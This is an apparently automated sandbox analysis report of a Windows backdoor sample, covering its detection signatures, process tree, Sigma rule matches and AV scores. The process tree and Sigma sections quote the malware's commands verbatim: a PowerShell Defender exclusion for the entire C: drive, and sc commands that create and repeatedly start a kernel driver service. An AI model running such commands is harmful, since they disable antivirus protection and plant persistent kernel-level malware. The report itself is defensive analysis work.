Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yvaKqhmD4L.exe

Overview

General Information

Sample name:yvaKqhmD4L.exe
renamed because original name is a hash value
Original sample name:DEF808BED70D77EC70F201B7F9EDC125295D26128DF9E7E1796311742FC0D00A.exe
Analysis ID:1580559
MD5:17ae5643e60881d69e3e25122ca1fc67
SHA1:ab0e0bec78013e6406148f1dbc527756af31e988
SHA256:def808bed70d77ec70f201b7f9edc125295d26128df9e7e1796311742fc0d00a
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • yvaKqhmD4L.exe (PID: 6480 cmdline: "C:\Users\user\Desktop\yvaKqhmD4L.exe" MD5: 17AE5643E60881D69E3E25122CA1FC67)
    • yvaKqhmD4L.tmp (PID: 6460 cmdline: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" MD5: 6AD6576147BC6B91DD40240772510F4F)
      • powershell.exe (PID: 6592 cmdline: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 2124 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • yvaKqhmD4L.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT MD5: 17AE5643E60881D69E3E25122CA1FC67)
        • yvaKqhmD4L.tmp (PID: 2060 cmdline: "C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp" /SL5="$A022E,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT MD5: 6AD6576147BC6B91DD40240772510F4F)
          • 7zr.exe (PID: 5592 cmdline: 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 7zr.exe (PID: 6476 cmdline: 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs MD5: 84DC4B92D860E8AEA55D12B1E87EA108)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Conhost.exe (PID: 5592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5164 cmdline: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3384 cmdline: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6164 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6424 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6644 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2996 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5688 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6016 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6528 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 980 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4304 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3688 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5480 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6576 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 928 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6904 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6036 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5664 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6592 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6544 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5428 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6572 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5816 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 792 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5324 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5956 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5236 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6904 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3300 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5816 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3336 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5664 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1608 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5580 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 4296 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5064 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3336 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 1196 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6240 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 4304 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5024 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3336 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2088 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6576 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 3584 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 3844 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2916 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7028 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2828 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 5664 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 5496 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2132 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 2476 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6016 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • sc.exe (PID: 6460 cmdline: sc start CleverSoar MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 6424 cmdline: cmd /c start sc start CleverSoar MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp, ParentProcessId: 6460, ParentProcessName: yvaKqhmD4L.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6592, ProcessName: powershell.exe
Sigma detected: New Kernel Driver Via SC.EXE
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3384, ProcessName: sc.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp, ParentProcessId: 6460, ParentProcessName: yvaKqhmD4L.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6592, ProcessName: powershell.exe
Sigma detected: New Service Creation Using Sc.EXE
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5164, ParentProcessName: cmd.exe, ProcessCommandLine: sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto, ProcessId: 3384, ProcessName: sc.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp" /SL5="$20432,5790671,845824,C:\Users\user\Desktop\yvaKqhmD4L.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp, ParentProcessId: 6460, ParentProcessName: yvaKqhmD4L.tmp, ProcessCommandLine: "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'", ProcessId: 6592, ProcessName: powershell.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcReversingLabs: Detection: 26%
Source: C:\Program Files (x86)\Windows NT\hrsw.vbcVirustotal: Detection: 37%Perma Link
Source: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcVirustotal: Detection: 37%Perma Link
Source: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbcReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: yvaKqhmD4L.exeVirustotal: Detection: 11%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 86.7% probability
Source: yvaKqhmD4L.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: yvaKqhmD4L.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.1793648038.0000000000CD0000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.1793459655.0000000003590000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpCode function: 6_2_6C1EE090 FindFirstFileA,FindClose,FindClose,6_2_6C1EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,10_2_00CF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00CF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,10_2_00CF7496
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: yvaKqhmD4L.tmp, 00000001.00000003.1763374438.0000000004300000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, update.vbc.1.dr, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vbc.6.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
